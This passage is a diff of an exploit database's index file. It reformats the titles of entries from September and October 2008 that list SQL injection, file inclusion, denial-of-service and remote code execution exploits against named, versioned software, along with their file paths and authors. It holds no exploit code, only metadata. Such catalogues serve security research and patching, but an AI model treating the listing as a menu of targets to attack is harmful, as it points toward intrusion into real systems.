Remote SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 +6485,platforms/php/webapps/6485.txt,"addalink <= 4 - (category_id) Remote SQL Injection",2008-09-18,ka0x,php,webapps,0 +6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - (random) Remote SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 6487,platforms/php/webapps/6487.txt,"CYASK 3.x - (collect.php neturl) Local File Disclosure",2008-09-18,xy7,php,webapps,0 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site (picture_category.php id) SQL Injection",2008-09-18,SarBoT511,php,webapps,0 6489,platforms/php/webapps/6489.txt,"ProActive CMS (template) Local File Inclusion",2008-09-18,r45c4l,php,webapps,0 6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0 6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK ActiveX (NMSDVDX.dll) Exploit",2008-09-19,Nine:Situations:Group,windows,remote,0 -6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 +6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 - (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 6493,platforms/linux/dos/6493.pl,"fhttpd 0.4.2 un64() - Remote Denial of Service Exploit",2008-09-19,"Jeremy Brown",linux,dos,0 -6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 (detail.php) Remote SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0 +6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - (detail.php) Remote SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0 6495,platforms/php/webapps/6495.txt,"Explay CMS <= 2.1 Persistent XSS and CSRF",2008-09-19,hodik,php,webapps,0 6496,platforms/windows/dos/6496.c,"DESlock+ <= 3.2.7 - Local Kernel Overflow PoC",2008-09-20,mu-b,windows,dos,0 6497,platforms/windows/dos/6497.c,"DESlock+ <= 3.2.7 - Local Kernel Race Condition Denial of Service PoC",2008-09-20,mu-b,windows,dos,0 6498,platforms/windows/dos/6498.c,"DESlock+ <= 3.2.7 - (probe read) Local Kernel Denial of Service PoC",2008-09-20,mu-b,windows,dos,0 6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum <= 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0 6500,platforms/php/webapps/6500.txt,"Explay CMS <= 2.1 Insecure Cookie Handling",2008-09-20,Stack,php,webapps,0 -6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 (index.php page) Remote SQL Injection",2008-09-20,0x90,php,webapps,0 +6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 - (index.php page) Remote SQL Injection",2008-09-20,0x90,php,webapps,0 6502,platforms/php/webapps/6502.txt,"Diesel Pay Script (area) Remote SQL Injection",2008-09-20,ZoRLu,php,webapps,0 -6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 (p) Remote SQL Injection",2008-09-20,r45c4l,php,webapps,0 -6504,platforms/php/webapps/6504.txt,"Oceandir <= 2.9 (show_vote.php id) Remote SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0 -6505,platforms/php/webapps/6505.txt,"jPORTAL 2 (humor.php id) Remote SQL Injection",2008-09-20,r45c4l,php,webapps,0 +6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - (p) Remote SQL Injection",2008-09-20,r45c4l,php,webapps,0 +6504,platforms/php/webapps/6504.txt,"Oceandir <= 2.9 - (show_vote.php id) Remote SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0 +6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - (humor.php id) Remote SQL Injection",2008-09-20,r45c4l,php,webapps,0 6506,platforms/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Remote Directory Traversal",2008-09-21,"Luigi Auriemma",windows,remote,0 6507,platforms/php/webapps/6507.php,"Invision Power Board <= 2.3.5 - Remote SQL Injection Exploit",2008-09-21,waraxe,php,webapps,0 6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - Remote SQL Injection",2008-09-21,0x90,php,webapps,0 -6509,platforms/cgi/webapps/6509.txt,"TWiki <= 4.2.2 (action) Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0 +6509,platforms/cgi/webapps/6509.txt,"TWiki <= 4.2.2 - (action) Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0 6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities",2008-09-21,d3v1l,php,webapps,0 -6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 (singerid) Remote SQL Injection",2008-09-21,"Hussin X",php,webapps,0 +6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) Remote SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6512,platforms/php/webapps/6512.txt,"Diesel Job Site (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add-Admin",2008-09-21,"CWH Underground",php,webapps,0 6514,platforms/php/webapps/6514.txt,"Availscript Jobs Portal Script - File Upload (Auth)",2008-09-21,InjEctOr5,php,webapps,0 -6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit",2008-09-21,"NT Internals",windows,dos,0 -6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0 +6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service Exploit",2008-09-21,"NT Internals",windows,dos,0 +6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0 6517,platforms/php/webapps/6517.txt,"NetArtMedia Jobs Portal 1.3 - Multiple SQL Injection Vulnerabilities",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 6518,platforms/php/webapps/6518.txt,"NetArtMedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 -6519,platforms/php/webapps/6519.php,"PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit",2008-09-21,EgiX,php,webapps,0 -6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0 +6519,platforms/php/webapps/6519.php,"PHP iCalendar <= 2.24 - (cookie_language) LFI / File Upload Exploit",2008-09-21,EgiX,php,webapps,0 +6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 6522,platforms/php/webapps/6522.txt,"Availscript Article Script (view.php v) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6523,platforms/php/webapps/6523.php,"WCMS 1.0b Arbitrary Add Admin Exploit",2008-09-22,"CWH Underground",php,webapps,0 -6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 (vote.php) Remote SQL Injection",2008-09-22,d3v1l,php,webapps,0 -6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 (comments.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 +6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) Remote SQL Injection",2008-09-22,d3v1l,php,webapps,0 +6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - (comments.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6526,platforms/php/webapps/6526.txt,"PHP iCalendar <= 2.24 Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0 -6527,platforms/php/webapps/6527.txt,"BuzzyWall <= 1.3.1 (search.php search) SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0 +6527,platforms/php/webapps/6527.txt,"BuzzyWall <= 1.3.1 - (search.php search) SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0 6528,platforms/php/webapps/6528.txt,"WCMS 1.0b (news_detail.asp id) Remote SQL Injection",2008-09-22,"CWH Underground",php,webapps,0 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P (comments.php) Blind SQL Injection Exploit",2008-09-22,Stack,php,webapps,0 6530,platforms/php/webapps/6530.txt,"OpenElec <= 3.01 - (form.php obj) Local File Inclusion",2008-09-22,dun,php,webapps,0 6531,platforms/php/webapps/6531.txt,"MyBlog <= 0.9.8 Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0 6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 -6533,platforms/php/webapps/6533.txt,"basebuilder <= 2.0.1 (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0 -6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 (list.php) Remote SQL Injection",2008-09-22,d3v1l,php,webapps,0 +6533,platforms/php/webapps/6533.txt,"basebuilder <= 2.0.1 - (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0 +6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - (list.php) Remote SQL Injection",2008-09-22,d3v1l,php,webapps,0 6536,platforms/php/webapps/6536.pl,"CJ Ultra Plus <= 1.0.4 Cookie Remote SQL Injection Exploit",2008-09-22,-SmoG-,php,webapps,0 6537,platforms/windows/remote/6537.html,"Chilkat XML ActiveX Remote Arbitrary File Creation/Execution Exploit",2008-09-23,shinnai,windows,remote,0 -6538,platforms/php/webapps/6538.txt,"OpenRat <= 0.8-beta4 (tpl_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 +6538,platforms/php/webapps/6538.txt,"OpenRat <= 0.8-beta4 - (tpl_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 6539,platforms/php/webapps/6539.txt,"Sofi WebGui <= 0.6.3 PRE (mod_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 6540,platforms/php/webapps/6540.pl,"iGaming CMS <= 1.5 - Multiple Remote SQL Injection Exploit",2008-09-23,StAkeR,php,webapps,0 6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS <= 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0 @@ -6124,18 +6124,18 @@ id,file,description,date,author,platform,type,port 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-24,ZoRLu,php,webapps,0 6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - (detail.php item_id) SQL Injection",2008-09-24,GoLd_M,php,webapps,0 6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0 -6552,platforms/php/webapps/6552.txt,"mailwatch <= 1.0.4 (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0 -6553,platforms/php/webapps/6553.txt,"PHPcounter <= 1.3.2 (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0 +6552,platforms/php/webapps/6552.txt,"mailwatch <= 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0 +6553,platforms/php/webapps/6553.txt,"PHPcounter <= 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0 6554,platforms/windows/dos/6554.html,"Google Chrome Browser Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0 6555,platforms/php/webapps/6555.txt,"Jadu CMS for Government - (recruit_details.php) SQL Injection",2008-09-24,r45c4l,php,webapps,0 -6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 (filelocation) Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0 +6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - (filelocation) Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0 6557,platforms/php/webapps/6557.txt,"ADN Forum <= 1.0b Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0 6558,platforms/php/webapps/6558.txt,"barcodegen <= 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0 6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0 6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection",2008-09-25,InjEctOr5,php,webapps,0 -6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 (design) Local File Inclusion",2008-09-25,dun,php,webapps,0 -6563,platforms/php/webapps/6563.txt,"phpOCS <= 0.1-beta3 (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0 +6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - (design) Local File Inclusion",2008-09-25,dun,php,webapps,0 +6563,platforms/php/webapps/6563.txt,"phpOCS <= 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0 6564,platforms/php/webapps/6564.txt,"Vikingboard <= 0.2 Beta (task) Local File Inclusion",2008-09-25,dun,php,webapps,0 6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer DoS PoC",2008-09-25,Aodrulez,windows,dos,0 6566,platforms/php/webapps/6566.txt,"php infoboard 7 plus - Multiple Vulnerabilities",2008-09-25,"CWH Underground",php,webapps,0 @@ -6147,13 +6147,13 @@ id,file,description,date,author,platform,type,port 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 - (XSS/SQL) Remote Vulnerabilities",2008-09-25,d3v1l,php,webapps,0 6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0 -6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 (class_dir) Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 -6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 - (class_dir) Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 +6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL (go.php id) Remote SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 -6578,platforms/php/webapps/6578.txt,"212cafe Board 0.07 (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6578,platforms/php/webapps/6578.txt,"212cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager <= 1.18 Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 -6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 (NLST) Denial of Service Exploit",2008-09-26,"Julien Bedard",windows,dos,0 +6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service Exploit",2008-09-26,"Julien Bedard",windows,dos,0 6582,platforms/hardware/dos/6582.pl,"Windows Mobile 6.0 Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0 6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project <= 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0 6584,platforms/php/webapps/6584.txt,"The Gemini Portal <= 4.7 Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 @@ -6161,34 +6161,34 @@ id,file,description,date,author,platform,type,port 6586,platforms/php/webapps/6586.txt,"Crux Gallery <= 1.32 Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6587,platforms/php/webapps/6587.txt,"The Gemini Portal (lang) Remote File Inclusion Vulnerabilities",2008-09-26,ZoRLu,php,webapps,0 6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - (.ico) Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 -6589,platforms/php/webapps/6589.txt,"RPG.Board <= 0.0.8Beta2 (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0 +6589,platforms/php/webapps/6589.txt,"RPG.Board <= 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0 6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase (catid) Remote SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 6591,platforms/php/webapps/6591.txt,"RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 -6592,platforms/php/webapps/6592.txt,"X7 Chat <= 2.0.1A1 (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0 +6592,platforms/php/webapps/6592.txt,"X7 Chat <= 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0 6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - Remote SQL Injection",2008-09-27,elusiven,php,webapps,0 6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0 6595,platforms/php/webapps/6595.txt,"Joovili <= 3.0 - Multiple SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 6596,platforms/php/webapps/6596.txt,"E-Uploader Pro <= 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 -6598,platforms/php/webapps/6598.txt,"CoAST 0.95 (sections_file) Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0 +6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - (sections_file) Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0 6599,platforms/php/webapps/6599.txt,"Real Estate Manager (cat_id) Remote SQL Injection",2008-09-27,CraCkEr,php,webapps,0 6600,platforms/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 - File Execution / IE DoS Exploit",2008-09-27,e.wiZz!,windows,remote,0 -6601,platforms/php/webapps/6601.txt,"LnBlog <= 0.9.0 (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0 -6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0 -6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 (gallery.php id) Remote SQL Injection",2008-09-27,r45c4l,php,webapps,0 -6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 (path) Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0 -6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 (show.php catid) Remote SQL Injection",2008-09-27,InjEctOr5,php,webapps,0 +6601,platforms/php/webapps/6601.txt,"LnBlog <= 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0 +6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0 +6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) Remote SQL Injection",2008-09-27,r45c4l,php,webapps,0 +6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - (path) Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0 +6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) Remote SQL Injection",2008-09-27,InjEctOr5,php,webapps,0 6606,platforms/php/webapps/6606.txt,"Yoxel <= 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0 6607,platforms/php/webapps/6607.txt,"X7 Chat <= 2.0.1A1 - Local File Inclusion (original find)",2008-09-27,JIKO,php,webapps,0 -6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0 +6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0 6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 Window Object Suppressing DoS Exploit",2008-09-28,"Aditya K Sood",windows,dos,0 6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS (Search) Remote SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0 -6611,platforms/php/webapps/6611.php,"PHPcounter <= 1.3.2 (index.php name) Remote SQL Injection Exploit",2008-09-28,StAkeR,php,webapps,0 -6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 (guid) SQL Injection Vulnerabilities",2008-09-28,~!Dok_tOR!~,php,webapps,0 +6611,platforms/php/webapps/6611.php,"PHPcounter <= 1.3.2 - (index.php name) Remote SQL Injection Exploit",2008-09-28,StAkeR,php,webapps,0 +6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection Vulnerabilities",2008-09-28,~!Dok_tOR!~,php,webapps,0 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining (news_read.php id) SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 6615,platforms/windows/dos/6615.html,"Opera 9.52 Window Object Suppressing Remote Denial of Service Exploit",2008-09-28,"Aditya K Sood",windows,dos,0 6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - (.zip File) Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 -6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 +6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0 6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - (linkid) Remote SQL Injection",2008-09-28,boom3rang,php,webapps,0 @@ -6209,23 +6209,23 @@ id,file,description,date,author,platform,type,port 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Remote Blind SQL Injection",2008-09-30,ka0x,php,webapps,0 6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - (view_group.php id) SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6638,platforms/windows/remote/6638.html,"GdPicture Pro ActiveX - (gdpicture4s.ocx) File Overwrite / Exec Exploit",2008-09-30,EgiX,windows,remote,0 -6639,platforms/php/webapps/6639.txt,"Pritlog <= 0.4 (filename) Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0 +6639,platforms/php/webapps/6639.txt,"Pritlog <= 0.4 - (filename) Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0 6640,platforms/php/webapps/6640.pl,"ADN Forum <= 1.0b - BlindSQL Injection Exploit",2008-10-01,StAkeR,php,webapps,0 -6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion",2008-10-01,JosS,php,webapps,0 -6642,platforms/php/webapps/6642.txt,"BMForum 5.6 (tagname) Remote SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0 +6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin <= 1.5.5 - (COOKIE) Local File Inclusion",2008-10-01,JosS,php,webapps,0 +6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) Remote SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0 6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injection Vulnerabilities",2008-10-01,~!Dok_tOR!~,php,webapps,0 6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injection Vulnerabilities",2008-10-01,~!Dok_tOR!~,php,webapps,0 -6645,platforms/php/webapps/6645.txt,"Crux Gallery <= 1.32 (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0 -6646,platforms/php/webapps/6646.php,"phpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit",2008-10-01,EgiX,php,webapps,0 +6645,platforms/php/webapps/6645.txt,"Crux Gallery <= 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0 +6646,platforms/php/webapps/6646.php,"phpScheduleIt <= 1.2.10 - (reserve.php) Remote Code Execution Exploit",2008-10-01,EgiX,php,webapps,0 6647,platforms/windows/dos/6647.c,"ESET SysInspector - 1.1.1.0 (esiadrv.sys) Proof of Concept Exploit",2008-10-01,"NT Internals",windows,dos,0 -6648,platforms/php/webapps/6648.txt,"RPortal 1.1 (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0 +6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0 6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0 6650,platforms/php/webapps/6650.txt,"Link Trader (ratelink.php lnkid) Remote SQL Injection",2008-10-01,"Hussin X",php,webapps,0 6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 CWD command Remote Buffer Overflow PoC",2008-10-02,"Julien Bedard",windows,dos,0 6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0 -6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0 +6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0 -6655,platforms/php/webapps/6655.php,"OpenX 2.6 (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0 +6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0 6656,platforms/windows/remote/6656.txt,"Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 6657,platforms/php/webapps/6657.pl,"IP Reg <= 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x - (malformed archive) DoS Exploit",2008-10-03,LiquidWorm,windows,dos,0 @@ -6233,20 +6233,20 @@ id,file,description,date,author,platform,type,port 6660,platforms/windows/dos/6660.txt,"Serv-U <= 7.3 - (stou con:1) Denial of Service (Auth)",2008-10-03,dmnt,windows,dos,0 6661,platforms/windows/remote/6661.txt,"Serv-U <= 7.3 - Remote FTP File Replacement (Auth)",2008-10-03,dmnt,windows,remote,0 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite <= 1.3 - Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 -6663,platforms/php/webapps/6663.txt,"CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities",2008-10-03,SirGod,php,webapps,0 +6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion Vulnerabilities",2008-10-03,SirGod,php,webapps,0 6664,platforms/php/webapps/6664.txt,"Kwalbum <= 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0 6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow Exploit",2008-10-04,SkD,windows,remote,0 -6667,platforms/php/webapps/6667.txt,"pPIM 1.01 (notes.php id) Local File Inclusion",2008-10-04,JosS,php,webapps,0 -6668,platforms/windows/dos/6668.txt,"AyeView 2.20 (malformed gif image) Local Crash Exploit",2008-10-04,suN8Hclf,windows,dos,0 +6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - (notes.php id) Local File Inclusion",2008-10-04,JosS,php,webapps,0 +6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash Exploit",2008-10-04,suN8Hclf,windows,dos,0 6669,platforms/php/webapps/6669.txt,"JMweb - Multiple (src) Local File Inclusion Vulnerabilities",2008-10-04,SirGod,php,webapps,0 6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin <= 1.0 - Remote Arbitrary Upload Exploit",2008-10-04,Pepelux,php,webapps,0 6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0 